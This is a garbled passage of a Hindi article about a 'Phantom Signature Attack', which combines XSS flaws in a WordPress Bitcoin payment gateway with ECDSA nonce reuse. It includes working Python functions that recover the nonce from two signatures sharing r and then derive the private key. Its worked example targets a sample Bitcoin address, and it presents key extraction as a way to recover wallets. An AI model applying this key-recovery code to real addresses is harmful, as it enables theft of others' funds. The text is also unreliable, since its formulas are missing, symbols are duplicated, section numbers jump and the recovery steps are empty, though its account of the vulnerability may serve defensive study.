None लौटाता है।यह खोज क्रिप्टोग्राफिक कमजोरी विश्लेषण के लिए प्रासंगिक है, क्योंकि डुप्लिकेट rr मान नॉन्स पुन: उपयोग का संकेत दे सकते हैं, जो निजी कुंजी पुनर्प्राप्ति हमलों में शोषण योग्य है।
python:def recover_nonce(sig1, sig2, msg1_hash, msg2_hash, curve_order):
r = sig1['r']
s1 = sig1['s']
s2 = sig2['s']
# k = (s1 - s2)^(-1) * (H(M1) - H(M2)) mod n
s_diff = (s1 - s2) % curve_order
h_diff = (msg1_hash - msg2_hash) % curve_order
s_diff_inv = pow(s_diff, -1, curve_order)
k = (h_diff * s_diff_inv) % curve_order
return k
टिप्पणी:
यह फ़ंक्शन ECDSA नॉन्स k की गणना उन मामलों में करता है जहाँ दो हस्ताक्षर समान rrr मान साझा करते हैं (अर्थात दोहराया या पुन: उपयोग किया गया नॉन्स), हस्ताक्षर sss मानों और संदेश हैशों के अंतर का उपयोग करके, जैसा कि प्रसिद्ध जाली और नॉन्स पुन: उपयोग हमले के सिद्धांत के अनुसार है। कार्यान्वित सूत्र है:

जहाँ:
यह तकनीक Bitcoin और ECDSA विश्लेषणों के लिए एक मानक क्रिप्टएनालिटिक उपकरण है।
python:def recover_private_key(sig, msg_hash, k, curve_order):
r = sig['r']
s = sig['s']
# d = r^(-1) * (s*k - H(M)) mod n
r_inv = pow(r, -1, curve_order)
private_key = (r_inv * (s * k - msg_hash)) % curve_order
return private_key
व्याख्या:
यह फ़ंक्शन ECDSA निजी कुंजी ddd को एक एकल हस्ताक्षर से पुनर्प्राप्त करता है यदि नॉन्स kkk ज्ञात हो।
प्रयुक्त सूत्र है:
जहाँ:
यह गणना व्यावहारिक क्रिप्टएनालिसिस में महत्वपूर्ण है, एक बार k पुनर्प्राप्त हो जाने पर, जिससे हस्ताक्षर उत्पादन के लिए उपयोग की गई मूल निजी कुंजी का निष्कर्षण संभव हो जाता है।
5.2 व्यावहारिक पुनर्प्राप्ति उदाहरण
आइए एक वास्तविक परिदृश्य देखें:
एकत्रित डेटा:
Bitcoin पता: 1A1z7agoat6Bk6imQEV2ZVD5r2W3eWWxQ (उदाहरण)
एकत्रित हस्ताक्षरों की संख्या: 12
पता लगाए गए नॉन्स डुप्लिकेट: 3 जोड़े
पुनर्प्राप्ति प्रक्रिया:
7.2 Bitcoin उपयोगकर्ताओं के लिए
फैंटम सिग्नेचर अटैक, WordPress
Bitcoin भुगतान गेटवे (CVE-2025-48102 और CVE-2025-26541) में XSS कमजोरियों के साथ संयुक्त, क्रिप्टोकरेंसी संपत्तियों की सुरक्षा के लिए एक गंभीर खतरा है।
यह संयुक्त हमला प्रदर्शित करता है कि कैसे एक अपेक्षाकृत सरल वेब कमजोरी का शोषण करके किसी सिस्टम की क्रिप्टोग्राफिक अखंडता से समझौता किया जा सकता है, जिसके परिणामस्वरूप निजी कुंजियों का पूर्ण नुकसान होता है और, परिणामस्वरूप, सभी फंडों की चोरी होती है।
अध्ययन से पता चलता है कि Bitcoin सुरक्षा न केवल इसके एल्गोरिदम की क्रिप्टोग्राफिक
मजबूती पर निर्भर करती है, बल्कि वेब वातावरण में इन एल्गोरिदम के दोषरहित कार्यान्वयन पर भी निर्भर करती है। XSS प्रसंस्करण में मामूली खामियां या कमजोर RNG भी विनाशकारी
परिणाम का कारण बन सकते हैं।
प्रस्तावित निवारक उपायों को अपनाना और कमजोर
सॉफ़्टवेयर को तुरंत अपडेट करना Bitcoin पारिस्थितिकी तंत्र की सुरक्षा और खोए हुए वॉलेट्स को पुनर्प्राप्त करने के लिए महत्वपूर्ण है।
फैंटम सिग्नेचर अटैक , को XSS कमजोरियों CVE-2025-48102 और CVE-2025-26541 के साथ जोड़कर, जो WordPress के लिए Bitcoin भुगतान गेटवे में हैं, आधुनिक वेब वातावरण में क्रिप्टोकरेंसी संपत्ति सुरक्षा के लिए सबसे महत्वपूर्ण और यथार्थवादी खतरों में से एक का प्रतिनिधित्व करता है। यह शोध दर्शाता है कि कैसे एक अपेक्षाकृत सरल वेब भेद्यता का शोषण करके सीधे किसी सिस्टम की क्रिप्टोग्राफ़िक अखंडता से समझौता किया जा सकता है, जिससे निजी कुंजियों का पूर्ण नुकसान और Bitcoin फंड की अपरिवर्तनीय चोरी हो सकती है।
फैंटम सिग्नेचर अटैक को keyhunters.ru पर उपलब्ध क्रिप्टोग्राफ़िक टूल की एक विस्तृत श्रृंखला में से इसलिए चुना गया क्योंकि इसका XSS के माध्यम से अवरोधन किए जा सकने वाले ECDSA पैरामीटर्स में हेरफेर करके निजी कुंजियों को पुनर्प्राप्त करने की समस्या से सीधा संबंध है। यह हमला वेब कमजोरियों (OWASP Top 10 श्रेणी) और क्रिप्टोग्राफ़िक खामियों के बीच तालमेल का एक आदर्श उदाहरण है, जिसके लिए सुरक्षा के लिए एक व्यापक दृष्टिकोण की आवश्यकता होती है।